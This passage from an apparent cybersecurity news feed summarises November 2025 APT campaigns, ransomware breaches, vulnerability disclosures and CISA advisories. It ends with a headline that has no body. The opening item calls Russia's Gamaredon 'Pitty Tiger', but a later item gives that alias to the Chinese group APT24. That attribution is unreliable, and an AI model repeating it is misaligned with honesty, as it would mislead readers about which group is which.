In a rare and alarming discovery, security researchers have found evidence of operational collaboration between two of the world's most prolific state-sponsored hacking groups: Russia's Gamaredon (Pitty Tiger) and North Korea's Lazarus. The evidence centers on a shared command-and-control (C2) server IP address that was used by both groups within days of each other to deliver their respective malware payloads. This convergence of TTPs and infrastructure signals a potential new phase of cyber operations where geopolitical alliances between Moscow and Pyongyang are extending into direct, cooperative attacks, potentially amplifying the threat level for defenders globally.

Nov 26, 20256 min read

Water Gamayun APT Exploits Novel 'MSC EvilTwin' Windows Flaw in Stealthy Attacks

The Russia-aligned APT group Water Gamayun is actively exploiting a novel vulnerability in the Windows Microsoft Management Console (MMC), tracked as CVE-2025-26633. The attack, analyzed by Zscaler and dubbed 'MSC EvilTwin,' uses a malicious .msc file to proxy code execution through the trusted mmc.exe binary, making it difficult to detect. The multi-stage campaign begins with a malicious download and uses embedded commands to execute hidden PowerShell payloads. This technique allows the attackers to install backdoors and information stealers while evading traditional security measures, showcasing the group's continued sophistication in developing stealthy intrusion methods.

Nov 26, 20256 min read

CISA Warns of Critical Flaws in Industrial Control Systems, Including CVSS 10.0 Bug

On November 25, 2025, CISA issued seven new advisories for vulnerabilities in Industrial Control Systems (ICS) from multiple vendors, including Rockwell Automation, Opto 22, and Zenitel. The flaws affect equipment used globally in critical manufacturing and communications sectors. The most severe vulnerability, CVE-2025-64130, is a critical OS command injection flaw in Zenitel communications equipment with a CVSS score of 10.0, which could allow for remote code execution. Other advisories cover flaws leading to denial-of-service and information exposure, prompting CISA to urge immediate review and mitigation by asset owners.

Nov 26, 20256 min read

NVIDIA AI Toolkit and WordPress Plugins Hit with High-Severity Flaws

On November 25, 2025, several new software vulnerabilities were disclosed, including a high-severity Server-Side Request Forgery (SSRF) flaw in NVIDIA's NeMo Agent Toolkit (CVE-2025-33203) used for AI development. This flaw could lead to information disclosure and denial of service. Concurrently, vulnerabilities were found in popular WordPress plugins. The 'Just Highlight' plugin is affected by a stored Cross-Site Scripting (XSS) bug (CVE-2025-13311), while the 'Locker Content' plugin has a sensitive information exposure flaw (CVE-2025-12525) that could allow unauthenticated attackers to bypass content restrictions.

Nov 26, 20256 min read

Homeland Security Warns Gov't Shutdown and Lapsed Law Cripple U.S. Cyber Defenses

The U.S. House Committee on Homeland Security has issued a stark warning in its latest 'Cyber Threat Snapshot,' stating that the nation's ability to defend against cyber threats is being severely hampered. The report cites a dual crisis: a federal government shutdown that furloughs key cybersecurity personnel, and the lapse of the Cybersecurity Information Sharing Act of 2015. This creates 'dangerous blind spots' at a time of heightened threat activity from nation-state actors like China and Iran, and a surge in attacks against U.S. critical infrastructure.

Nov 25, 20254 min read

Akira Ransomware Targets M&A Blind Spots, Breaching Firms via Inherited SonicWall Devices

The Akira ransomware group is exploiting security blind spots created during corporate mergers and acquisitions (M&A). According to research by ReliaQuest, Akira affiliates are gaining initial access to acquiring companies by compromising vulnerable SonicWall SSL VPN appliances inherited from smaller, acquired firms. Attackers leverage the fact that the acquiring organizations are often unaware of these unpatched, legacy devices on their new network. Once inside, they use zombie credentials and move laterally, with the time from lateral movement to ransomware deployment averaging less than one hour, highlighting a rapid and effective attack chain.

Nov 25, 20255 min read

URGENT: CISA Orders 7-Day Patch for Actively Exploited FortiWeb Zero-Day

Fortinet has disclosed a critical OS command injection zero-day vulnerability, CVE-2025-58034, in its FortiWeb Web Application Firewall (WAF) that is being actively exploited in the wild. The flaw allows an authenticated attacker to execute arbitrary commands on the underlying system. In response to observed attacks, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog and issued an emergency directive mandating federal agencies apply patches within an accelerated seven-day window, by November 25, 2025. Researchers have detected approximately 2,000 attacks leveraging the flaw and warn it could potentially be chained with a recently disclosed authentication bypass vulnerability (CVE-2025-64446) to achieve unauthenticated remote code execution.

Nov 24, 20255 min read

Massive NPM Supply Chain Attack Spreads Self-Replicating "Shai-Hulud" Worm

A significant, ongoing supply chain attack is targeting the NPM JavaScript ecosystem, where a self-replicating worm dubbed "Shai-Hulud" has infected over 400 software packages. The attack has a substantial impact on the cryptocurrency sector, compromising at least 10 widely used libraries crucial for the Ethereum Name Service (ENS), including 'content-hash' and 'address-encoder'. The malware functions as a general-purpose credential stealer, exfiltrating secrets like wallet keys from infected developer environments. The scale is vast, with researchers at Wiz observing over 25,000 affected repositories, highlighting a critical threat to developer infrastructure worldwide.

Nov 24, 20255 min read

FCC Rolls Back ISP Cybersecurity Rules Despite China-Linked Hacking Threats

In a controversial decision, the U.S. Federal Communications Commission (FCC) has rescinded cybersecurity regulations for internet service providers (ISPs). These rules were implemented by the Biden Administration following the discovery that the Chinese state-sponsored hacking group Salt Typhoon had breached major U.S. carriers. The revoked rules mandated minimum security standards and compliance certifications. The FCC claimed the original ruling was based on a "flawed legal analysis," but the move has drawn sharp criticism, with Commissioner Anna M. Gomez stating it leaves the country "less secure" against increasing nation-state threats.

Nov 24, 20254 min read

Akira Ransomware Gang Hits LG Energy Solution, Claims 1.7TB Data Theft

South Korean battery manufacturing giant LG Energy Solution has confirmed it was the victim of a ransomware attack at one of its overseas facilities. The notorious Akira ransomware gang has claimed responsibility for the breach, alleging on its dark web leak site that it stole 1.7 terabytes of data from the company's network. While LG Energy Solution reports that the affected systems have been restored and its headquarters was not impacted, the incident highlights the continued threat of double-extortion ransomware attacks against the manufacturing sector. The Akira gang has been highly active, often gaining initial access via compromised VPN credentials.

Nov 24, 20255 min read

New "Autumn Dragon" Espionage Campaign Targets Southeast Asia

A newly identified cyber-espionage campaign named "Autumn Dragon" has been targeting government and media organizations across Southeast Asia since early 2025. The operation, attributed with medium confidence to a China-nexus Advanced Persistent Threat (APT) group, aims to gather intelligence related to the South China Sea. The attackers use spearphishing emails with malicious WinRAR archives that exploit the vulnerability CVE-2025-8088. Upon execution, a dropper script masquerading as a Windows Defender update retrieves and runs additional payloads to establish a foothold for intelligence gathering.

Nov 24, 20255 min read

ShadowPad Backdoor Deployed via Critical WSUS Server Vulnerability

An active intrusion campaign is exploiting a critical remote code execution (RCE) vulnerability, CVE-2025-59287, in Microsoft's Windows Server Update Services (WSUS). Attackers, believed to be Chinese state-sponsored APTs, are leveraging the flaw to gain system-level access and deploy the sophisticated ShadowPad backdoor. The attack chain involves using PowerShell and legitimate system utilities like 'certutil' and 'curl' to download the malware, which is then executed using a DLL sideloading technique for stealth and persistence. The campaign highlights the rapid weaponization of newly disclosed vulnerabilities for espionage purposes.

Nov 24, 20255 min read

Supply Chain Breaches Escalate Despite Maturing Defenses, Report Finds

A new 2025 report from cybersecurity firm BlueVoyant reveals a troubling trend: despite most organizations maturing their third-party risk management (TPRM) programs, the number of supply chain breaches is escalating. The study found that 97% of surveyed organizations experienced a supplier-related security incident in the past year, a significant jump from 81% in 2024. The report identifies ineffective tool integration and internal organizational silos as key barriers, with the manufacturing sector being particularly hard-hit, averaging 3.8 breaches per organization.

Nov 24, 20254 min read

Ransomware Attacks Peak on Holidays and Weekends, Exploiting Low Staffing

A new global study by Semperis, the "2025 Holiday Ransomware Risk Report," confirms that threat actors strategically launch attacks during holidays and weekends to exploit reduced security staffing. The report found that 52% of organizations were targeted during these off-hour periods. Alarmingly, 78% of companies cut their Security Operation Center (SOC) staffing by 50% or more during these times. The study also revealed that 60% of attacks follow major corporate events like mergers or layoffs, when organizations are most distracted.

Nov 24, 20253 min read

Italian IT Firm Almaviva Hit by Cyberattack, 2.3TB of Data Leaked

The prominent Italian IT services provider Almaviva has confirmed it was hit by a major cyberattack, resulting in the theft and leaking of nearly 2.3 terabytes of sensitive data. The breach has exposed information from several of Almaviva's clients, most notably Italy's national railway operator, Ferrovie dello Stato Italiane. The leaked files reportedly include highly sensitive data such as passenger passport details, employee records, financial documents, and defense-related contracts. The identity of the attackers has not yet been disclosed.

Nov 24, 20255 min read

Harvard University Data Breach Exposes Donor Information After Phone Phishing Attack

Harvard University has disclosed a data breach affecting its Alumni Affairs and Development Office, discovered on November 18, 2025. The incident originated from a phone-based phishing (vishing) attack that gave an unauthorized party access to systems containing personal information and donation records of university affiliates and donors. While highly sensitive data like Social Security numbers were reportedly not compromised, the breach exposed names, contact details, and donation histories. This attack follows a similar pattern seen in recent incidents at Princeton University and the University of Pennsylvania, indicating a targeted campaign against the development departments of major educational institutions.

Nov 23, 20255 min read

Logitech Confirms Breach: Clop Ransomware Exploits Oracle Zero-Day

Logitech has confirmed it suffered a data breach after the Clop ransomware gang exploited a zero-day vulnerability in Oracle's E-Business Suite (CVE-2025-61882). The consumer electronics giant stated that an unauthorized third party accessed and copied data related to employees, consumers, and suppliers. The incident is part of a wider campaign by Clop that has impacted numerous major organizations. Logitech asserts that sensitive personal data like credit card numbers was not exposed and business operations remain unaffected.

Nov 23, 20255 min read

CISA KEV Alert: Actively Exploited Oracle RCE Flaw Allows Full System Takeover

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical remote code execution (RCE) vulnerability in Oracle Identity Manager, CVE-2025-61757, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, with a CVSS score of 9.8, allows an unauthenticated attacker to achieve RCE by chaining an authentication bypass with a code injection flaw in a Groovy script endpoint. Evidence of in-the-wild exploitation, including scans detected weeks before a patch was available, has prompted CISA to issue a patching deadline of December 12, 2025, for federal agencies.

Nov 22, 20255 min read

Chinese APT24 Group Uses 'BadAudio' Malware in Years-Long Espionage Campaign Targeting Taiwan

The Chinese-nexus threat group APT24, also known as Pitty Tiger, is behind a nearly three-year cyberespionage campaign utilizing a new custom malware called 'BadAudio'. According to Google's Threat Intelligence Group, the campaign, active since November 2022, has targeted organizations primarily in Taiwan. The group has evolved its tactics from broad web compromises to sophisticated supply chain attacks and spear-phishing. BadAudio is a C++ downloader that uses DLL search-order hijacking and control flow flattening to evade detection before deploying second-stage payloads like Cobalt Strike.

Nov 22, 20256 min read

Major Wall Street Banks Exposed After Breach at Mortgage Vendor SitusAMC

SitusAMC, a critical technology and services provider for the real estate finance industry, has disclosed a significant data breach discovered on November 12, 2025. The cyberattack compromised corporate information and, more critically, data belonging to its clients' customers, which could include sensitive personal information from mortgage applications. Major financial institutions, including JPMorgan Chase, Citigroup, and Morgan Stanley, have reportedly been notified of their potential exposure. The FBI is investigating the incident, which highlights the systemic risk posed by third-party vendors in the financial sector.

Nov 22, 20255 min read

Grafana Enterprise Hit by Critical 10.0 CVSS Flaw Allowing Admin Impersonation

Grafana Labs has patched a critical vulnerability, CVE-2025-41115, in Grafana Enterprise that carries the maximum CVSS score of 10.0. The flaw resides in the SCIM provisioning feature and allows a malicious SCIM client to escalate privileges and impersonate any user, including the default administrator, by manipulating the 'externalId' attribute. The vulnerability affects Grafana Enterprise versions 12.0.0 through 12.2.1 and requires specific feature flags to be enabled. Grafana has released patches and confirmed its own cloud instances were not exploited.

Nov 22, 20255 min read

CrowdStrike Fires Insider for Leaking Screenshots to 'Scattered Lapsus$ Hunters' Hacking Group

Cybersecurity giant CrowdStrike has confirmed it fired an employee last month for acting as a malicious insider. The employee leaked screenshots of internal systems, including an Okta dashboard, to the 'Scattered Lapsus$ Hunters' hacking group, who then posted them on Telegram. CrowdStrike stated that it detected and terminated the insider, that its corporate systems were not breached, and that no customer data was compromised. The hackers claimed to have offered the employee $25,000 for access, highlighting the persistent threat of malicious insiders even at top security firms.

Nov 22, 20255 min read

ShinyHunters Hits Salesforce Again, Breaching Customers via Gainsight App

Salesforce has disclosed a significant data breach affecting its customers, stemming from a compromised connection with the Gainsight customer success application. The notorious cybercrime group ShinyHunters, also tracked as UNC6240, has claimed responsibility for the attack, stating they exploited OAuth tokens to gain unauthorized access to approximately 285 additional Salesforce instances. In response, Salesforce has revoked credentials and removed the Gainsight apps from its AppExchange. The incident highlights the growing risk of supply chain attacks targeting trusted third-party SaaS integrations to pivot into major enterprise environments.

Nov 21, 20256 min read

SEC Abandons Landmark Lawsuit Against SolarWinds and its CISO

In a surprising move, the U.S. Securities and Exchange Commission (SEC) has voluntarily dismissed its civil enforcement action against SolarWinds and its CISO, Timothy G. Brown. The lawsuit, filed in October 2023, had accused the company and Brown of misleading investors about their cybersecurity posture before the 2020 SUNBURST supply chain attack. The dismissal is seen as a major victory for the cybersecurity community, which had feared the case would set a dangerous precedent for holding security executives personally liable for breaches and create a chilling effect on transparency.

Nov 21, 20255 min read

WEL Companies Investigated for Data Breach Affecting 122,960 People

The law firm Schubert Jonckheer & Kolbe LLP is investigating transportation and logistics firm WEL Companies, Inc., following a data breach that compromised the sensitive personal information of 122,960 people. The breach, which exposed names, Social Security numbers, and driver's license numbers, was first detected in January 2025. However, the company only began notifying victims in November 2025, a delay of nearly ten months that could lead to legal action for violating data breach notification laws.

Nov 21, 20254 min read

Patch Now: Microsoft Fixes Actively Exploited Windows Kernel Zero-Day

As part of its November 2025 Patch Tuesday release, Microsoft has addressed 63 security vulnerabilities, including a high-severity zero-day flaw in the Windows Kernel (CVE-2025-62215) that is confirmed to be under active exploitation. The vulnerability is a local privilege escalation (LPE) bug with a CVSS score of 7.0, allowing an attacker who has already gained initial access to a system to elevate their privileges to SYSTEM level. Such flaws are critical components in post-exploitation attack chains, enabling threat actors to take full control of a compromised machine. The update also fixes 16 remote code execution (RCE) vulnerabilities and numerous other flaws across the Microsoft product suite. Immediate patching is strongly recommended for all Windows users.

Nov 21, 20255 min read

Sinobi Ransomware Strikes US Manufacturer and Indian Tech Firm

The 'sinobi' ransomware group has claimed responsibility for two recent cyberattacks targeting organizations in the United States and India. The victims are Croft, a U.S.-based window and door manufacturer, and CHANGEPOND, an enterprise software company headquartered in Chennai, India. Both breaches were discovered on November 19, 2025, occurring within minutes of each other. These incidents underscore the global reach and indiscriminate targeting of ransomware operators, affecting diverse sectors including manufacturing and technology. The attacks highlight the persistent threat posed by ransomware and the importance of robust cybersecurity defenses.

Nov 20, 20254 min read

CISA and Partners Release Guide to Combat Bulletproof Hosting

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), along with the FBI, NSA, and international partners, has published a comprehensive guide to help network defenders and Internet Service Providers (ISPs) combat the threat of bulletproof hosting (BPH) providers. These services knowingly lease infrastructure to cybercriminals for a wide range of malicious activities, including ransomware, phishing, and malware distribution. The guide, 'Bulletproof Defense,' provides actionable recommendations for filtering malicious traffic, enhancing network monitoring, and improving intelligence sharing to disrupt the criminal ecosystem that relies on BPH for anonymity and resilience.

Nov 20, 20254 min read

CISA Issues 6 New ICS Advisories for Schneider Electric, Shelly, METZ CONNECT

On November 19, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released six new Industrial Control Systems (ICS) advisories, highlighting multiple vulnerabilities in products from Schneider Electric, Shelly, and METZ CONNECT. The alerts affect a range of operational technology (OT) products, including SCADA systems and power monitoring devices. Four of the advisories are for Schneider Electric products like EcoStruxure and PowerChute. CISA urges administrators in critical infrastructure and manufacturing sectors to review the advisories and apply the recommended mitigations to prevent potential exploitation.

Nov 20, 20254 min read

CISA Releases "Be Air Aware" Guides to Combat Drone Threats

As part of Critical Infrastructure Security and Resilience Month, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has released three new guides under its "Be Air Aware™" campaign. These resources are designed to help critical infrastructure owners and operators understand, assess, and mitigate the growing security risks posed by Unmanned Aircraft Systems (UAS), or drones. The guides provide actionable information on detecting suspicious drone activity, implementing detection technologies, and safely handling downed aircraft, aiming to integrate aerial threat considerations into existing security plans.

Nov 20, 20254 min read

New 'Nova Stealer' Malware Targets macOS Crypto Wallets

A new information-stealing malware, dubbed 'Nova Stealer,' has been discovered actively targeting Apple macOS users. The malware's primary goal is the exfiltration of sensitive data, with a specific focus on cryptocurrency wallets. Nova Stealer operates as a trojan, infecting systems by replacing legitimate, installed applications with malicious versions. When a user launches the compromised application, the malware activates in the background to search for and steal wallet files and other valuable information. This discovery underscores the increasing trend of threat actors developing malware for the macOS platform, challenging the perception of it being inherently more secure than Windows.

Nov 20, 20254 min read

Inc Ransom Cripples PA Attorney General's Office, Exfiltrates 5.7 TB of Data

The Pennsylvania Office of the Attorney General (OAG) has confirmed it suffered a severe data breach orchestrated by the Inc Ransom ransomware group. The attackers exploited the 'CitrixBleed2' vulnerability (CVE-2025-5777) to gain initial access and subsequently exfiltrated 5.7 terabytes of highly sensitive data. The stolen information includes Social Security numbers, medical details, and confidential investigative files. The attack, which occurred in August 2025, caused a three-week operational disruption for the agency's 1,200 staff members. The OAG has refused to pay the ransom and is working with the FBI on the investigation.

Nov 19, 20257 min read

US, UK, and Australia Sanction Russian Bulletproof Hosting Network Aiding Ransomware

In a coordinated action, the United States, United Kingdom, and Australia have sanctioned Media Land, LLC, a Russian bulletproof hosting provider, along with its network of related entities and key individuals. This infrastructure is accused of providing essential services to a wide range of global cybercriminals, including malware distributors, phishing operators, and ransomware groups like the notorious LockBit gang. The sanctions aim to disrupt the foundational services that enable cybercrime by targeting the providers who knowingly support malicious operations. The action highlights a strategic international effort to dismantle the cybercrime economy.

Nov 19, 20256 min read

CISA Adds Actively Exploited Fortinet FortiWeb Flaw to KEV Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical OS command injection vulnerability in Fortinet's FortiWeb products, CVE-2025-58034, to its Known Exploited Vulnerabilities (KEV) catalog. Citing evidence of active exploitation, CISA has mandated a one-week remediation deadline for Federal Civilian Executive Branch (FCEB) agencies under Binding Operational Directive (BOD) 22-01. The vulnerability allows attackers to execute arbitrary commands on affected devices. CISA strongly urges all organizations using FortiWeb to prioritize patching this flaw to mitigate the threat.

Nov 19, 20256 min read

Chicago's St. Anthony Hospital Discloses Data Breach Affecting Over 6,600

St. Anthony Hospital in Chicago has reported a data breach that may have exposed the personal and medical information of more than 6,600 patients and staff members. The incident, which was discovered in February 2025, occurred when an unauthorized party gained access to several employee email accounts. An investigation revealed that the compromised accounts contained sensitive data, including names, Social Security numbers, medical record numbers, and medical histories. The hospital states there is no evidence the data has been misused but is in the process of notifying all affected individuals.

Nov 19, 20256 min read

Supply Chain Attacks & AI-Powered Phishing Surge Across Asia-Pacific, Darktrace Warns

A new threat report from cybersecurity firm Darktrace highlights a dramatic increase in sophisticated cyber threats across the Asia-Pacific and Japan (APJ) region. The report, covering the 12 months to July 2025, details a surge in supply chain attacks, business email compromise, and cloud intrusions. State-sponsored groups from China (APT40, APT41) and North Korea (Lazarus/Bluenoroff) are reportedly leveraging generative AI to create more convincing phishing emails, particularly in non-English languages like Japanese. The report also notes the high cost of supply chain breaches and the use of advanced voice-phishing by groups like Scattered Spider.

Nov 19, 20257 min read

China-Aligned APT 'PlushDaemon' Wields 'EdgeStepper' Implant for Network Hijacking

Security researchers have uncovered a new, sophisticated network implant named 'EdgeStepper' used by the China-aligned APT group PlushDaemon. The implant provides the attackers with adversary-in-the-middle (AitM) capabilities, allowing them to intercept and hijack legitimate software updates within a compromised network. EdgeStepper is deployed as part of a larger toolset that includes 'LittleDaemon' and 'DaemonicLogistics' to deliver a Windows implant called 'SlowStepper'. This framework enables the APT group to conduct espionage and deploy additional malware by masquerading as legitimate update traffic.

Nov 19, 20257 min read

Togo and Mozambique Forge Cybersecurity Pact to Strengthen African Defenses

The nations of Togo and Mozambique have signed a Memorandum of Understanding (MoU) to formalize their cooperation on cybersecurity. The agreement, signed during the inaugural International Cybersecurity Week in Mozambique, establishes a framework for their national Computer Security Incident Response Teams (CSIRTs) to collaborate. The partnership will focus on sharing real-time threat intelligence, conducting joint capacity-building exercises, and coordinating operational responses to cyber incidents, aiming to bolster the digital resilience of both nations and the wider African continent.

Nov 19, 20254 min read

Vendor Breach Exposes Patient Data at Innovative Physical Therapy

Innovative Physical Therapy has notified patients of a data breach that originated from a third-party vendor responsible for practice management. The breach occurred when two vendor employees fell victim to phishing emails, leading to the compromise of their email accounts. Between June 25 and June 26, 2025, an unauthorized party accessed these accounts, which contained the protected health information (PHI) and personally identifiable information (PII) of at least 2,023 patients. The exposed data includes names, Social Security numbers, medical information, and health insurance details.

Nov 19, 20256 min read

Urgent Patch Required: Critical RCE Flaw in W3 Total Cache WordPress Plugin

A critical command injection vulnerability, CVE-2025-9501, with a CVSS score of 9.0, has been found in the W3 Total Cache WordPress plugin, which is active on over one million websites. The flaw allows unauthenticated attackers to achieve remote code execution (RCE) by simply submitting a malicious comment. This enables a complete site takeover. All versions prior to 2.8.13 are affected, and administrators are urged to update immediately.

Nov 18, 20255 min read

Kenyan Government Websites Defaced in Coordinated Cyberattack

On November 17, 2025, a coordinated cyberattack targeted and temporarily disabled numerous Kenyan government websites. The Ministry of Interior and National Administration confirmed the breach, which impacted the websites of the State House and ministries of Health, Education, and Energy, among others. Reports indicate several of the compromised sites were defaced with white supremacist slogans and symbols. The Kenyan government has since restored services and vowed to bring the perpetrators to justice.

Nov 18, 20255 min read

Merck Employee Data Breached in Third-Party Vendor Incident

Pharmaceutical giant Merck has confirmed a data breach impacting its current and former employees due to a cybersecurity incident at a third-party service provider, Graebel Companies. The breach, which occurred in September 2025, was disclosed on November 17. Exposed data includes sensitive PII such as names, Social Security numbers, and financial account information. Merck is offering 24 months of complimentary credit monitoring services to affected individuals.

Nov 18, 20255 min read

WordPress Security Plugin Ironically Contains Critical File-Read Flaw

A critical vulnerability, CVE-2025-11705, has been discovered in the 'Anti-Malware Security and Brute-Force Firewall' WordPress plugin, which is active on over 100,000 sites. The flaw allows any authenticated user, including low-privilege subscribers, to read arbitrary files from the server. This can be exploited to access the sensitive wp-config.php file, leading to a full database compromise and site takeover. Users are urged to update the plugin immediately.

Nov 18, 20255 min read

NSFOCUS Mitigates Massive 843 Gbps DDoS Attack on Critical Infrastructure

Security vendor NSFOCUS has detailed its successful effort to mitigate a massive multi-vector DDoS attack that targeted a critical infrastructure operator in October 2025. The attack peaked at an enormous 843.4 Gbps and 73.6 million packets per second, sustaining high volumes for over 30 minutes. The assault was dominated by a UDP flood, accounting for over 600 Gbps of the traffic. NSFOCUS's Cloud DDoS Protection Service successfully filtered over 99.9% of the malicious traffic, keeping the operator's services online.

Nov 18, 20255 min read

Cl0p Gang Exploits Oracle Zero-Day to Breach Logitech, Washington Post, and More

The notorious Cl0p cyber extortion gang has orchestrated a massive data breach campaign by exploiting a zero-day vulnerability in Oracle's E-Business Suite (EBS), tracked as CVE-2025-61882. Swiss electronics giant Logitech has confirmed it was a victim, filing a data breach notification with the SEC. The campaign has also compromised other major organizations, including The Washington Post, Allianz UK, and GlobalLogic. Cl0p is known for exploiting vulnerabilities in widely-used enterprise software to simultaneously hit a large number of high-value targets, exfiltrating data for double extortion.

Nov 18, 20255 min read

DoorDash Hit by Data Breach After Employee Targeted in Social Engineering Scam

Food delivery service DoorDash has confirmed a data breach after an employee was compromised by a social engineering scam, allowing an unauthorized third party to access internal systems. The breach exposed the names, physical addresses, phone numbers, and email addresses of an undisclosed number of customers in the United States, Canada, Australia, and New Zealand. The company has stated that financial information was not accessed. This incident highlights the persistent threat of attackers targeting the 'human element' to bypass technical security controls.

Nov 17, 20254 min read

Iranian APT 'SpearSpecter' Targets Officials' Families in Sophisticated Espionage Campaign

The Iranian state-sponsored group APT42, also known by aliases like SpearSpecter, is conducting a highly sophisticated and ongoing espionage campaign targeting senior defense and government officials. According to the Israel National Digital Agency, the threat actors are using advanced social engineering tactics, including building trust over weeks and targeting victims' family members to apply psychological pressure. The campaign's technical core is 'TameCat,' a modular PowerShell-based backdoor that operates in-memory and uses legitimate services like Telegram and Discord for stealthy command-and-control.

Nov 17, 20255 min read

Eurofiber Breach Exposes Thales, Orange, and French Government Data in Major Supply Chain Incident

European digital infrastructure provider Eurofiber has confirmed a major data breach in its French division, potentially exposing sensitive data from over 3,600 clients, including major corporations like Thales and Orange, and several French government ministries. A threat actor known as 'ByteToBreach' claims to have exploited vulnerabilities (CVE-2024-29889, CVE-2025-24799) in Eurofiber's GLPI IT asset management software via SQL injection. The stolen data, now for sale on the dark web, allegedly includes highly sensitive information such as SSH private keys, VPN configurations, and API keys, posing a severe supply chain risk.

Nov 17, 20255 min read

Pro-Russian Hackers Target Denmark with DDoS Attacks Ahead of Elections

The pro-Russian hacktivist group NoName057(16) has claimed responsibility for a series of Distributed Denial-of-Service (DDoS) attacks that targeted Danish government websites, political parties, and defense-related entities. The attacks, which occurred just before Denmark's municipal and regional elections, were designed to cause disruption and informational noise. Targets included the Danish Ministry of Transport and the national citizen portal, Borger.dk. While the outages were brief, the incident aligns with a pattern of politically motivated cyber activity by the group against European nations supporting Ukraine.

Nov 17, 20254 min read

Microsoft Patches Actively Exploited Windows Kernel Zero-Day in November Update

As part of its November 2025 Patch Tuesday release, Microsoft has addressed 63 security flaws, including a zero-day vulnerability in the Windows Kernel (CVE-2025-62215) that is being actively exploited. The flaw is an elevation of privilege vulnerability with a CVSS score of 7.0, allowing a local attacker to gain SYSTEM-level access. The vulnerability affects all supported versions of Windows and Windows Server. Due to its active exploitation in the wild, immediate patching is strongly recommended.

Nov 17, 20253 min read

Critical RCE Flaws in AI Engines From Meta, NVIDIA, Microsoft Discovered

Security researchers have discovered critical remote code execution (RCE) vulnerabilities in widely used AI inference servers from major tech companies, including Meta, NVIDIA, and Microsoft, as well as open-source projects like vLLM. The vulnerabilities stem from the unsafe use of Python's 'pickle' module for data deserialization and exposed ZeroMQ (ZMQ) messaging endpoints. Exploitation could allow attackers to take full control of AI models and servers, posing a significant risk to enterprise AI infrastructure. Some flaws, termed 'Shadow Vulnerabilities,' remain unpatched in production environments.

Nov 16, 20256 min read

RansomHouse Hits H&M and Adidas Supplier in Major Fashion Supply Chain Attack

The RansomHouse ransomware group has attacked Fulgar S.p.A., a major Italian textile manufacturer and a key supplier for global fashion brands like H&M and Adidas. The attack, confirmed on November 3, 2025, resulted in the exfiltration and leak of sensitive corporate data. This incident highlights the significant and growing risk of supply chain attacks in the fashion industry, where a compromise at a single supplier can have cascading impacts on major international retailers.

Nov 16, 20255 min read

Pig Butchering Scams Evolve into Global Cybercrime Menace, FBI Warns

A new threat intelligence report, supported by warnings from the FBI, details the rapid evolution of "Pig Butchering" scams into one of the most economically damaging forms of global cybercrime. These sophisticated, long-con investment schemes leverage social engineering, emotional grooming, and fraudulent cryptocurrency trading platforms to defraud victims of massive sums. The scam involves building a relationship of trust over weeks or months before convincing the victim to invest in a fake, high-yield opportunity.

Nov 16, 20256 min read

APT Caught Exploiting Cisco & Citrix Zero-Days in Sophisticated Attack

Amazon's threat intelligence team has discovered a sophisticated advanced persistent threat (APT) campaign that exploited two separate zero-day vulnerabilities in Cisco Identity Service Engine (CVE-2025-20337) and Citrix products (CVE-2025-5777) before they were publicly known. The attackers used the flaws to gain pre-authentication remote code execution and deployed custom, in-memory malware designed to evade detection. This discovery highlights a growing trend of targeting identity and access management systems at the network edge and underscores the capabilities of highly-resourced threat actors.

Nov 16, 20256 min read

Ransomware Attacks Surge 50% in 2025; Qilin Group Takes the Lead

Cybersecurity researchers report a staggering 50% increase in ransomware attacks in 2025, with over 5,000 incidents claimed on dark web leak sites by late October. This surge occurs amidst a significant realignment in the ransomware ecosystem, with formerly dominant groups fading while new and resurgent actors like Qilin take their place. The Qilin group has been particularly prolific, leading in victim counts for most of the past six months. The United States remains the most targeted nation, and the industrial sector is the most heavily impacted industry. PowerShell has become the primary tool for attackers, used in nearly 78% of observed campaigns.

Nov 15, 20255 min read

Checkout.com Rejects Ransom After ShinyHunters Breach, Donates to Research

The global payment processor Checkout.com has disclosed a data breach orchestrated by the ShinyHunters cybercrime group. The attackers exploited a legacy third-party cloud file storage system that was improperly decommissioned. After being contacted with a ransom demand, Checkout.com refused to pay. In a bold move, the company announced it will instead donate the equivalent ransom amount to cybersecurity research institutions, including Carnegie Mellon University and the University of Oxford. The breach did not impact the core payment platform or cardholder data.

Nov 15, 20254 min read

Fortinet Patches Actively Exploited FortiWeb Zero-Day (CVE-2025-64446)

Fortinet has released a patch for a critical, actively exploited zero-day vulnerability in its FortiWeb web application firewall (WAF). The flaw, tracked as CVE-2025-64446, is a relative path traversal vulnerability that allows an unauthenticated remote attacker to execute arbitrary administrative commands by sending specially crafted HTTP/S requests. Due to evidence of active exploitation, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added the vulnerability to its Known Exploited Vulnerabilities (KEV) catalog, mandating that federal agencies patch it immediately. The flaw affects a wide range of FortiWeb versions, making immediate patching a top priority for all customers.

Nov 15, 20254 min read

150,000+ Malicious NPM Packages Flood Registry in Crypto Token Farming Scheme

Security researchers from Amazon have uncovered one of the largest package flooding incidents in the history of the npm open-source registry, involving over 150,000 malicious packages. In a novel twist, the campaign was not designed for traditional malicious activities like stealing credentials or deploying ransomware. Instead, the attackers aimed to conduct a large-scale token farming operation by exploiting the incentive system of tea.xyz, a decentralized protocol that rewards open-source developers with 'TEA tokens'. The self-replicating packages automatically generated and published new junk packages, each linked to the attackers' blockchain wallets, polluting the ecosystem and abusing the reward mechanism.

Nov 15, 20254 min read

Critical 9.8 CVSS Auth Bypass Flaw in NVIDIA AIStore Disclosed

The Zero Day Initiative (ZDI) has publicly disclosed a critical authentication bypass vulnerability in NVIDIA's AIStore, an open-source object storage platform for AI applications. The flaw, tracked as CVE-2025-33186, carries a CVSS score of 9.8 and is caused by hard-coded credentials within the platform's authentication component. A remote, unauthenticated attacker could exploit this vulnerability to completely bypass authentication and gain unauthorized access to the system, compromising the confidentiality and integrity of AI models and data. A second, high-severity information disclosure flaw (CVE-2025-33185) was also disclosed.

Nov 15, 20254 min read

CISA Warns Cisco ASA Devices Still Under Attack, Issues New Patch Guidance

